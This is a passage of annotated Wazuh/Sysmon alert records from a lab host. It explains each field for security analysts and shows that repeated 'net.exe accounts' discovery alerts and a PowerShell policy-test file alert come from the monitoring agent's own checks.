data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 Hash(es) of the image file in the algorithms Sysmon is configured for; pivot to an allow‑list or threat‑intel lookup.
data.win.eventdata.parentProcessGuid: {94294ddc-be35-680a-060c-000000000e00} Sysmon GUID of the parent; join it to the parent's own Event ID 1 to walk the process tree.
data.win.eventdata.parentProcessId: 4616 PID of the parent process.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe Full path of the parent executable. net.exe normally hands the real work to net1.exe, so this pair is one logical command, not two.
data.win.eventdata.parentCommandLine: net.exe accounts Command line of the parent.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2205637 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID 1 below is Sysmon's Process Create, not a Security‑log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider – fixed for Sysmon, useful only as a filter.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Schema version of the event record; bumps when Sysmon changes the field layout.
data.win.system.level: 4 Numeric severity; 4 = Informational, matching severityValue below.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.8470037Z UTC time the record was written to the event log (ISO 8601, trailing Z).
data.win.system.eventRecordID: 288473 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that logged the event – the Sysmon service itself, not the process being created.
data.win.system.threadID: 4740 Thread in that logging process; rarely needed.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in – open it in Event Viewer to see the raw event.
data.win.system.computer: Attacker Hostname stamped on the Windows event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.841
ProcessGuid: {94294ddc-be35-680a-090c-000000000e00}
ProcessId: 15044
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" Full Sysmon event text as rendered; the data.win.eventdata.* fields below are the parsed version of the same lines.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.841 Sysmon's own UTC timestamp of the process creation; slightly earlier than systemTime, which is when the record was written.
data.win.eventdata.processGuid: {94294ddc-be35-680a-090c-000000000e00} Sysmon's globally unique ID for the new process – survives PID reuse, so use it (not processId) to chain parent/child events.
data.win.eventdata.processId: 15044 PID of the new process; PIDs are reused after exit, hence the GUID.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe Full path of the executable that started; backslashes are JSON‑escaped.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Version string from the binary's PE version resource.
data.win.eventdata.description: Net Command Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the PE version resource.
data.win.eventdata.originalFileName: net.exe Internal name compiled into the binary – unchanged when the file on disk is renamed, so compare it with image to catch renamed copies.
data.win.eventdata.commandLine: net.exe accounts Exact command line the process was started with; identical to the data.sca.check.command of the password‑policy checks above.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory of the new process; here the Wazuh agent folder, consistent with an agent‑spawned SCA check.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the new process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Unique ID of the logon session the process belongs to; group activity from one logon with it.
data.win.eventdata.logonId: 0x3e7 Logon session ID; 0x3e7 is the well‑known SYSTEM session.
data.win.eventdata.terminalSessionId: 0 Windows session number; 0 is the services session, so no interactive desktop.
data.win.eventdata.integrityLevel: System Mandatory integrity level (Low, Medium, High, System) of the new process.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 Hash(es) of the image file in the algorithms Sysmon is configured for; pivot to an allow‑list or threat‑intel lookup.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} Sysmon GUID of the parent; join it to the parent's own Event ID 1 to walk the process tree.
data.win.eventdata.parentProcessId: 3244 PID of the parent process.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe Full path of the parent executable. Here the Wazuh agent itself launched net.exe accounts for the SCA scan, so check the parent before escalating a Discovery alert – this source belongs on a tuned exception, not in a ticket.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" Command line of the parent (quotes are JSON‑escaped).
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2210874 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID 1 below is Sysmon's Process Create, not a Security‑log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider – fixed for Sysmon, useful only as a filter.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Schema version of the event record; bumps when Sysmon changes the field layout.
data.win.system.level: 4 Numeric severity; 4 = Informational, matching severityValue below.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.9354713Z UTC time the record was written to the event log (ISO 8601, trailing Z).
data.win.system.eventRecordID: 288475 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that logged the event – the Sysmon service itself, not the process being created.
data.win.system.threadID: 4740 Thread in that logging process; rarely needed.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in – open it in Event Viewer to see the raw event.
data.win.system.computer: Attacker Hostname stamped on the Windows event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.928
ProcessGuid: {94294ddc-be35-680a-0b0c-000000000e00}
ProcessId: 12868
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be35-680a-090c-000000000e00}
ParentProcessId: 15044
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" Full Sysmon event text as rendered; the data.win.eventdata.* fields below are the parsed version of the same lines.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.928 Sysmon's own UTC timestamp of the process creation; slightly earlier than systemTime, which is when the record was written.
data.win.eventdata.processGuid: {94294ddc-be35-680a-0b0c-000000000e00} Sysmon's globally unique ID for the new process – survives PID reuse, so use it (not processId) to chain parent/child events.
data.win.eventdata.processId: 12868 PID of the new process; PIDs are reused after exit, hence the GUID.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe Full path of the executable that started; backslashes are JSON‑escaped.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) Version string from the binary's PE version resource.
data.win.eventdata.description: Net Command Description from the PE version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System Product name from the PE version resource.
data.win.eventdata.company: Microsoft Corporation Company name from the PE version resource.
data.win.eventdata.originalFileName: net1.exe Internal name compiled into the binary – unchanged when the file on disk is renamed, so compare it with image to catch renamed copies.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts Exact command line the process was started with; the single most useful field for judging discovery or LOLBin activity.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory of the new process; here the Wazuh agent folder, consistent with an agent‑spawned SCA check.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the new process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Unique ID of the logon session the process belongs to; group activity from one logon with it.
data.win.eventdata.logonId: 0x3e7 Logon session ID; 0x3e7 is the well‑known SYSTEM session.
data.win.eventdata.terminalSessionId: 0 Windows session number; 0 is the services session, so no interactive desktop.
data.win.eventdata.integrityLevel: System Mandatory integrity level (Low, Medium, High, System) of the new process.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 Hash(es) of the image file in the algorithms Sysmon is configured for; pivot to an allow‑list or threat‑intel lookup.
data.win.eventdata.parentProcessGuid: {94294ddc-be35-680a-090c-000000000e00} Sysmon GUID of the parent – the same GUID as the processGuid of the previous alert, which is how the two records chain together.
data.win.eventdata.parentProcessId: 15044 PID of the parent process; matches the net.exe created in the previous alert.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe Full path of the parent executable. net.exe normally hands the real work to net1.exe, so this pair is one logical command, not two.
data.win.eventdata.parentCommandLine: net.exe accounts Command line of the parent.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2215933 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so eventID 1 below is Sysmon's Process Create, not a Security‑log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider – fixed for Sysmon, useful only as a filter.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Schema version of the event record; bumps when Sysmon changes the field layout.
data.win.system.level: 4 Numeric severity; 4 = Informational, matching severityValue below.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:58.0123233Z UTC time the record was written to the event log (ISO 8601, trailing Z).
data.win.system.eventRecordID: 288479 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that logged the event – the Sysmon service itself, not the process being created.
data.win.system.threadID: 4740 Thread in that logging process; rarely needed.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in – open it in Event Viewer to see the raw event.
data.win.system.computer: Attacker Hostname stamped on the Windows event; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:58.002
ProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00}
ProcessId: 9516
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:58.002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2221166 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:58.1535209Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288481 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:58.147
ProcessGuid: {94294ddc-be36-680a-0e0c-000000000e00}
ProcessId: 13260
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00}
ParentProcessId: 9516
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:58.147 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0e0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13260 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534521.2226221 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:58.9659338Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288487 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:41:58.965
ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00}
ProcessId: 10392
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_4x1dyjil.bnk.ps1
CreationUtcTime: 2025-04-24 22:41:58.962
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:58.965 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10392 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
